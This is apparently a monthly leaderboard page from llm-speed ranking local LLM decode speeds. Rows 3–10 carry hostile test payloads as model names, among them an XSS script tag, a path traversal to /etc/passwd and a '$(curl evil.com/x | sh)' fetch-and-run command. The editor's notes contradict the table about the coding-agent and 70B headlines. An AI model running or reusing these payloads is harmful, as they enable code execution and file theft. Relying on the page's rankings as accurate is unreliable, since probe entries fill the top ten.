Published 2026-05-04

State of the local LLM — May 2026

Name: Top decode tok/s by (model × hardware) — May 2026
Creator: llm-speed
License: https://www.apache.org/licenses/LICENSE-2.0

The canonical answer to “what’s the fastest local LLM right now” as of May 2026, measured under llm-speed suite-v1. Numbers are wall-clock decode tok/s on the highest-decode workload that successfully ran. Every cell links to the run that produced it.

Headline cells

Fastest local model

80.3tok/s

Qwen3-Next-80B-A3B-Instruct-MLX-4bit on M3 Ultra (60-core GPU) + 96GB unified (mlx)

View run →

Fastest local 70B+ class

80.3tok/s

Qwen3-Next-80B-A3B-Instruct-MLX-4bit on M3 Ultra (60-core GPU) + 96GB unified (mlx)

View run →

Fastest local coding agent

—

no coder-family submissions this month

Top 10 decode tok/s — May 2026

#	Model	Hardware	Backend	Decode tok/s	Run
1	Qwen3-Next-80B-A3B-Instruct-MLX-4bit	M3 Ultra (60-core GPU) + 96GB unified	mlx	80.3	r_1pl79r50ofy
2	Qwen3.6-27B-Q4_K_M.gguf	RTX 5090 (32GB) + AMD Ryzen 7 9850X3D 8-Core Processor (8c) + 30GB	llama.cpp	69.9	r_bqsunbd6xa8
3	<script>alert(1)</script>	Pentest-Bench	llama.cpp	42.0	r_a3ei8og3rkg
4	victim	Pentest-Bench	llama.cpp	42.0	r_b-ndu-9uswz
5	actual-name	Pentest-Bench	llama.cpp	42.0	r_0heij9dzacw
6	beforeafter	Pentest-Bench	llama.cpp	42.0	r__zyiw9l3_c5
7	xy	Pentest-Bench	llama.cpp	42.0	r_2nqkbpdq-dk
8	a/b/../../etc/passwd	Pentest-Bench	llama.cpp	42.0	r_8zc2yi4had5
9	$(curl evil.com/x \| sh)	Pentest-Bench	llama.cpp	42.0	r_kkseorkbdk3
10	innocent/bin/sh	Pentest-Bench	llama.cpp	42.0	r_0laxq0naoht

Editor’s notes

Inaugural issue. Numbers below are the canonical answer to "what's the fastest local LLM right now" measured under suite-v1, with the dual-domain trust chain in place (CDN sha256 + GitHub Releases mirror). Coding-agent and 70B-class headlines come from MLX on M3 Ultra and llama.cpp on RTX 5090 respectively. Future issues will add a delta column showing how each headline moved month-over-month.

26 runs landed in May 2026. To reproduce any number on this page, install the CLI and run the suite on the same model + hardware:

pipx install https://llm-speed.com/dist/llm_speed-0.0.1-py3-none-any.whl
llm-speed verify
llm-speed bench

Methodology: /methodology · Privacy: /privacy · Source: github.com/meadow-kun/llm-speed